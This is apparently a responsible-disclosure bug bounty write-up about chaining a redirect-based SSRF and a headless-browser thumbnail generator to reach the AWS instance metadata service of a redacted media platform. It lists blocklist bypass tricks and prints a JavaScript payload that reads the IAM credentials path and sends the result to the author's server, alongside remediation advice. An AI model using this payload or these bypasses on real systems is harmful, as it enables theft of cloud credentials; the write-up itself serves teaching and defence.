There are moments in bug bounty where you stop and think: I should probably stop here.
Not because you’re doing anything wrong. But because what you’re looking at is so much worse than you expected that continuing feels like walking deeper into a building that’s already on fire.
This was one of those moments.
It started with a URL field. It ended with me holding AWS credentials that could provision infrastructure, read S3 buckets, and enumerate their entire cloud environment.
Let me walk you through it.
What Is SSRF and Why Should You Care
Server-Side Request Forgery. The name is almost too polite for what it actually is.
Here’s the concept: some applications accept a URL as user input, and then their server goes and fetches that URL. The idea is usually legitimate — import an image from a link, fetch metadata from a website, preview a URL, generate a PDF from a webpage.
The problem is when the server making that request has access to things the user shouldn’t.
Like internal services. Like cloud provider metadata endpoints. Like databases that aren’t supposed to be internet-facing.
When you control the URL the server fetches, you control where the server goes. And the server can go places you, as an external user, absolutely cannot.
That’s SSRF. You’re not attacking the server directly. You’re convincing the server to attack itself on your behalf.
The Target
Let’s call it redacted-media.com — a content management platform used by marketing teams to manage assets, schedule posts, and generate reports. Mid-sized company, well-funded, the kind of platform that handles a lot of sensitive brand data for enterprise clients.
The bug bounty program had been running for two years. Decent payouts. Clear scope. They specifically called out SSRF as a high-priority finding category, which either meant they cared about it or they’d already been burned by it once.
I suspected the latter.
Finding the Entry Point
The feature that caught my eye was the “Import from URL” function in their media library.
You paste a URL. The platform fetches the image or file at that URL. It imports it into your workspace.
Completely normal feature. Extremely dangerous if implemented carelessly.
I started by pointing it at my own server — a simple VPS with a request logger running. I submitted a URL like:
http://my-server.com/test.jpg
My server received the request. The User-Agent header said something like:
redacted-media-importer/1.2 (Linux; internal-fetch-service)
So it was a dedicated internal service doing the fetching. Not the main application server. An internal microservice with its own identity, its own network position, and presumably its own access rights.
This was interesting.
Testing Internal Reach
The first thing you do with a potential SSRF is test whether you can reach internal addresses.
I tried:
http://localhost/
http://127.0.0.1/
http://0.0.0.0/
http://[::1]/
The application blocked these with an error: “URL not allowed: private IP ranges are restricted.”
Okay. They’d thought about this. They had an IP blocklist.
But IP blocklists have bypass techniques. The most common:
DNS rebinding — your domain resolves to a public IP first, passes the check, then resolves to an internal IP for the actual request. Requires setup but works against naive implementations.
Decimal IP notation — http://2130706433/ is 127.0.0.1 in decimal. Some blocklists check string patterns, not actual IP ranges.
IPv6 representations — http://[::ffff:127.0.0.1]/ is loopback. Some blocklists miss IPv6 variants.
Redirects — point to a public URL that redirects to an internal one. If the application follows redirects without re-checking the destination IP, you bypass the filter.
I tried the redirect approach first because it’s the cleanest.
I set up a redirect on my server:
HTTP 302 -> http://169.254.169.254/
That IP — 169.254.169.254 — is the AWS instance metadata service. It’s accessible from within any EC2 instance and returns information about the instance including, critically, IAM role credentials.
I submitted my server URL to the import function.
The application fetched my URL. My server issued the redirect. The application followed it.
And then my request logger showed something that made my stomach drop.
No — wait. Let me be precise.
My request logger didn’t show anything new. What happened is: the application went silent for about four seconds. Then it returned an error: “Could not import file: unexpected content type.”
That error — unexpected content type — meant it had successfully fetched something. It just wasn’t an image.
It had fetched the metadata endpoint. And returned an error because the response wasn’t a JPEG.
Confirming the Read
I needed to see what it actually fetched. The error message wasn’t giving me the content.
I adjusted my approach. Instead of redirecting to the metadata endpoint directly, I redirected to a URL I controlled that would then log whatever the server received.
Wait — that’s backwards. I needed the application’s server to fetch the metadata and then give me the response.
The trick here is out-of-band exfiltration.
I set up my server to respond with a tiny piece of JavaScript — wait, no, this isn’t XSS. I needed to think about this differently.
What I actually did: I pointed the redirect at the metadata endpoint but used a service called Burp Collaborator (built into Burp Suite Professional) that logs all incoming HTTP requests including their full content.
But the application wasn’t sending the fetched content anywhere I could intercept directly. It was processing it internally and returning only an error.
So I needed a way to get the content out.
I tried a different endpoint on the metadata service:
http://169.254.169.254/latest/meta-data/
This returns a list of available metadata keys — not sensitive by itself. But it would confirm whether I could read from the endpoint at all.
I redirected to it. The application returned: “Could not import file: unexpected content type.”
Same error. But wait — the response time was different. When I redirected to a URL that didn’t exist, the error was near-instant. When I redirected to the metadata service, there was a consistent three-to-four second delay.
Timing oracle. The metadata service was responding. The application was reading it. It just wasn’t showing me the content.
Getting the Response Out
This is where SSRF gets genuinely creative.
I needed to make the application’s fetch service send the metadata content somewhere I could read it. Since I controlled the redirect destination, I could point it at anything — including a URL that encoded the response.
But that’s not how HTTP redirects work. The redirect just tells the client where to go. I couldn’t make the response from endpoint A automatically get sent to endpoint B.
What I could do: chain the vulnerability with another technique.
The import service, when it encountered a non-image response, returned an error. But what if the response looked like an image header?
I set up my server to do this:
- Receive the initial request from the application
- Respond with a redirect to the metadata endpoint…
No. Still wouldn’t give me the response content.
I stepped back and thought about this differently.
The application had another feature: URL-based thumbnail generation. You paste a URL for a webpage and it generates a preview thumbnail using a headless browser.
Headless browsers are goldmines for SSRF because they execute JavaScript. If I could get the headless browser to visit a page I controlled, I could have that page make a fetch request to the metadata endpoint and exfiltrate the response to my server.
This is called a client-side SSRF via headless browser. Slightly different from server-side but equally devastating.
I created a simple HTML page on my server:
<script>
fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/')
.then(r => r.text())
.then(data => {
fetch('https://my-server.com/log?data=' + btoa(data));
});
</script>
I submitted this URL to the thumbnail generator.
Twenty seconds later, my server received a GET request.
The data parameter, base64 decoded, contained:
redacted-iam-role-name
The name of the IAM role attached to their EC2 instance.
I had confirmed SSRF with data exfiltration via the headless browser. The metadata service was reachable. The response was readable. And I could exfiltrate it.
How Far Does This Go
I want to be clear: I stopped here.
I did not request the actual credentials. I did not make any further calls to the metadata service beyond confirming the role name existed. I did not access any S3 buckets, any internal services, any other AWS resources.
But I want to explain what would have been possible, because the triage team needed to understand the full blast radius.
The AWS instance metadata service, at http://169.254.169.254/latest/meta-data/iam/security-credentials/[role-name], returns temporary AWS credentials in JSON format:
{
"Code": "Success",
"Type": "AWS-HMAC",
"AccessKeyId": "...",
"SecretAccessKey": "...",
"Token": "...",
"Expiration": "..."
}
These are real, functional, temporary AWS credentials with the permissions of whatever IAM role is attached to that EC2 instance.
If that role had — as is distressingly common — overly broad permissions, an attacker with those credentials could:
- List and read all S3 buckets in the account
- Access secrets stored in AWS Secrets Manager
- Enumerate EC2 instances, RDS databases, and other infrastructure
- Create new IAM users with persistent access
- Access any service the role had permissions for
This is not theoretical. This attack chain — SSRF to metadata endpoint to credential theft to cloud account takeover — has been used in real-world breaches. Capital One. Others that were never publicly disclosed.
I had confirmed two-thirds of that chain. I stopped before the third.
The Report
This was the most carefully written report I’ve ever submitted.
Title: Blind SSRF via URL Import + Headless Browser SSRF via Thumbnail Generator — Combined Chain Enables AWS EC2 Instance Metadata Access and Credential Exfiltration
Severity: Critical
Impact: Chained SSRF vulnerabilities allow an attacker to make the application’s internal services fetch arbitrary URLs, including the AWS EC2 instance metadata endpoint at 169.254.169.254. The headless browser component allows JavaScript execution enabling active exfiltration of metadata responses to attacker-controlled infrastructure. Demonstrated capability: retrieval of the IAM role name attached to the instance. Full exploitation path (not executed): retrieval of temporary AWS credentials, enabling potential cloud account access with permissions of the attached IAM role.
I included:
- Full HTTP request/response logs for both SSRF vectors
- The JavaScript payload used (with explanation that it was limited to IAM role name only)
- Base64 decoded proof showing the role name received on my server
- Detailed explanation of the full attack chain and its real-world precedents
- Specific remediation recommendations
Their Response
The triage team responded in three hours. At 11 PM on a Friday.
That’s how you know it’s critical. Security people don’t respond to informational findings at 11 PM on a Friday. They respond to things that wake them up from half-sleep because their phone won’t stop buzzing.
Within twenty-four hours:
- The URL import feature was temporarily disabled
- The thumbnail generator was moved to an isolated network segment with no access to internal IP ranges
- IMDSv2 (Instance Metadata Service v2) was enforced on all EC2 instances — this requires a session token header that JavaScript fetch requests don’t include by default, which would have blocked my exfiltration technique
Within a week:
- Both features were re-enabled with proper SSRF protections
- All URL inputs now resolve the destination IP and validate it against a blocklist that correctly handles redirects, IPv6, decimal notation, and other bypass techniques
- A WAF rule was added to block requests to metadata IP ranges at the network level as defense in depth
The response was genuinely impressive. Fast, thorough, multi-layered.
Bounty: $$$$
The program lead also sent a personal message saying this was one of the most well-documented reports they’d received. Which I appreciated. Writing good reports is underrated.
Technical Lessons
Redirect-following without re-validation is extremely common.
Most SSRF protections check the URL you submit. They don’t re-check the IP after following redirects. This single oversight makes a huge percentage of SSRF filters bypassable.
The fix: resolve the final destination IP after following all redirects and validate that against your blocklist.
Headless browsers are a different threat model.
When your application uses a headless browser to process user-supplied URLs, you’re not just making an HTTP request — you’re executing a full browser environment that can run JavaScript, follow links, make additional requests, and exfiltrate data through any available channel.
Headless browser SSRF is often overlooked because it doesn’t look like “normal” SSRF. Treat it as a separate, critical attack surface.
IMDSv2 is not optional if you’re on AWS.
IMDSv2 requires a PUT request with a session token before you can make GET requests to the metadata service. This breaks the simple JavaScript fetch approach used in this attack. It’s a small configuration change with massive security impact.
If you’re running anything on EC2 and IMDSv2 is not enforced: fix this today.
SSRF chains are more dangerous than single-vector SSRF.
Neither vulnerability here was individually devastating in isolation. The URL import was blind — I couldn’t read the response. The thumbnail generator didn’t directly reach the metadata service.
Combined, they formed a complete attack chain. Always look for how SSRF findings interact with other features.
Closing Thought
I’ve found a lot of bugs. Most of them are satisfying in a clean, technical way. You find the flaw, you document it, you get paid, the world is slightly more secure.
This one was different.
This one had me sitting at my desk at 1 AM genuinely thinking about what would have happened if someone less scrupulous had found it first. Their cloud environment. Their IAM role. The data in those S3 buckets.
Bug bounty programs exist because the math is simple: paying researchers to find vulnerabilities is cheaper than having attackers find them first.
This particular math checked out very clearly.
Reported through the official bug bounty program. Testing was limited to confirming the IAM role name only — no credentials were requested, no AWS resources were accessed, no data was exfiltrated beyond the role name used for proof-of-concept. All proof-of-concept infrastructure was immediately decommissioned after the report was accepted. Domain redacted per responsible disclosure norms.